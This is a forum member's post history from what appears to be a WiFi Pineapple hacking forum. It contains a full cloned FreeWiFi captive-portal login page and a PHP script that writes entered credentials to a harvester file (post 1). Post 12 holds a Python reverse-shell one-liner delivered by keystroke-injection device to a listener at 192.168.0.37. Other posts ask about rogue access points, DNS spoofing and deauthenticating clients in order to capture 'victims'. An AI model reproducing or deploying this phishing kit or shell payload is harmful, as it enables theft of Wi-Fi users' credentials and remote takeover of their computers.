Jump to content

carmelo42

Active Members
  • Posts

    38
  • Joined

  • Last visited

Everything posted by carmelo42

  1. Hello, I'm trying to set up evil portal with credential harvester. so I have duplicated an wifi hotspot identification page, and I use it as my evil portal splash page. But, in this identification page, I have a "ok" button, wich is redirecting on a post.php page : this page writes the txt file with the credential entered ... But as I have not reached the $authtarget page, the client stays unconnected, and even the post.php cannot be reached ... Have you some idea ? Here is my splash page : <!DOCTYPE html"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=400, user-scalable = no"> <title></title> <link rel="stylesheet" type="text/css" href="http://172.16.42.1/freewifi_fichiers/small.css" media="screen"> </head> <body> <div id="header"> <div id="header_c"> <div id="top"> <div id="top-menu"><img src="http://172.16.42.1/freewifi_fichiers/logo2.png" alt="Free" height="112" width="232"></div> </div> </div> <div class="clearer"></div> </div> <div id="bod"> <div id="bod_c"> <div id="block"> <h1>CONNEXION AU SERVICE <span class="red">FreeWiFi</span></h1> <br> <div id="block_2"> <p>Pour vous connecter au service FreeWiFi, <br> utilisez les identifiants que vous avez configurés lors de votre premier accès au service<br> </p><form id="form1" name="form1" method="post" action="post.php"> <label for="login" class="label"> IDENTIFIANT</label> <input name="login" id="login" class="input_r" required> <br> <br> <br> <label for="password" class="label"> MOT DE PASSE</label> <input name="password" id="password" class="input_r" value="" type="password" required> <br> <br> <br> <!-- <a href="#" class="label" style="padding-top:0px;"><img src="/im/help.png" alt="ASSISTANCE" width="37" height="40" border="0" /></a> --> <!-- <input name="priv" id="priv" type="hidden" value="" /> --> <input name="submit" value="Valider" class="input_b" type="submit"> </form> <div class="clearer"></div> </div> <a href="https://wifi.free.fr/?priv=$PRIV_SUB"><img src="http://172.16.42.1/freewifi_fichiers/abo.jpg" alt="Vous n'êtes pas abonné FREE? Cliquez ici et dans une minute, vous pourrez accéder à internet" border="0" height="70" width="399"></a></div> </div> </div> </body></html> Here is mu post.php page : <?php $file = 'harvester_2014-09-22 20:12:59.594540.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=/etc/nodogsplash/htdocs/$authtarget" />
  2. Hi guys, I have tried but I can't make it work :( Can someone explain how to use (briefly) PineAP ? I want the client auto connect to my pineapple, without select it in their wireless preferences (like Karma with previous firmware) A quick "pineAP use guide" like : one the PineAP tile, clic "enable", and after ..." Please I need some help :)
  3. Something goes wrong ... I can't get karma or PineAP running ... So on the MV, we have 3 network interfaces : - LAN - WLAN0 - WLAN1 I connect my "evil" PC to the pineApple through ethernet. I connected via Wifi Manager v2.1 radio0 to my regular SSID, which provides internet to the pineapple I want to use radio1 to "karma" victims ... May be I'm wrong ?
  4. ok thanks Ftb, at the moment I can't figure out how to use PineAP ... but I will search ;)
  5. Hmmm in the PineAP tile, there is a 'MK5 Karma' button ... I just enabled it ... I don't understand the PineAP role ...
  6. Hello guys ! Since I'm with 2.0.4 firmware, I can't use Karma anymore ... When I click to enable it, it appears as enabled, but on my wireless client (laptops, smarthpones, ...) I can't see the previous known networks ... Before this firmware, all was working fine ...
  7. ok thank you Sebkinne :) I juste installed evilportal on my MV, and I'm going to play with it :) So, if I understand, I don't need DNSSpoof anymore ?
  8. Hello, I am trying to do this scenario : 1) With KARMA, i want some clients get auto connected to my pineapple 2) With DNSSpoof, I redirect all the client to my fake wifi authentification page, which is on my Kali Laptop. The fake wifi page logs the credentials entered by the 'victim'. 3) The victim is redirected through internet and can navigate as if it was on the real wifi authentification page (the pineapple is connected to internet with WLAN1 as client) Is this even possible ? A little schema attached ;) thanks, Carmelo
  9. yes, but what if I can't flush the cash on the client ? (if the computer is in another room where I can't go)
  10. Hello guys, I'm trying to have fun with DNS Spoof but I have some problems ... In the DNSSpoof conf, I have this : 172.16.42.1 microsoft.com I activate DNSSpoof, navigate on microsoft.com with my browser, the pine apple html page appears. It works. But, if I deactivate DNSSpoof from the PineApple, my browser continues to go into the pine apple page when I want to reach microsoft.com ... Even with DNSSpoof off ! What can I do ? Thanks Carmelo
  11. Here is the file I use : https://www.sendspace.com/file/4figxr
  12. Same problem here with a french mac keyboard. I have encoded my ducky script with the ressource frmac.properties. Here is what my ducky writes : python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.0.37,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(q/bin/sh,-iq);' Here is what I have in my script : python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.37",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  13. Nope, it's WPA2 protected, but as it's mine, I'm in ! What I don't understand : do I have to be connected on the wireless network BEFORE putting the card into monitor mode ? And in wireshark what interface do I have to listen ? wlan0 ? mon0 ?
  14. Hello guys and girls :) So I'm trying to sniff HTTP with wireshark : - I have an ALFA 500 wireless card, connected to my pentest computer - the alfa card is connected on my wifi network. - I want to sniff HTTP that comes from my 2nd computer, which is on the same wireless network. How can I do this ? (it's workingvery well if my pentest computer is ethernet connected)
  15. How can it crack WPA / WPA2 networks ? I think it will need dictionary file ?
  16. Hello Guys :) A little topic to ask you what are the usages you're having with your pineapple :) Me : Little DNS Spoofing with Karma. You ?
  17. may be if you put your commands into a bash script, and run the script with dip switch ? #!/bin/bash command 1 command 2 and you launch this script with dip switch
  18. great great great :D Thanks a lot ! I will google to learn how to deauth the clients !
  19. Thanks for your answers :) I'm starting to answer how it works ... But I have some difficulties ... About Karma : if I understand what it does, it creates an open wireless network. When some device is searching for known networks, Karma says "yes it's me" and the device connects to the pineapple. But what if there is in the area already a real known network ? Will the device connect to karma or to the real network ? And if the device is already connected to the a real network, how can I disconnected it to force the connexion to the pineapple ?
  20. Hello ! I just received my PinneApple :) So I'm having fun with but .. In Karme > Karme Configuration > SSID Configuration, I have created a wireless network named "CARTEL", checked the box "persistent. It works, I can see on my phone the CARTEL network. But how can I delete it ? After stopping KARMA and DNS SPOOF, I still can connect to the CARTEL network from my phone .... Thanks !!
×
×
  • Create New...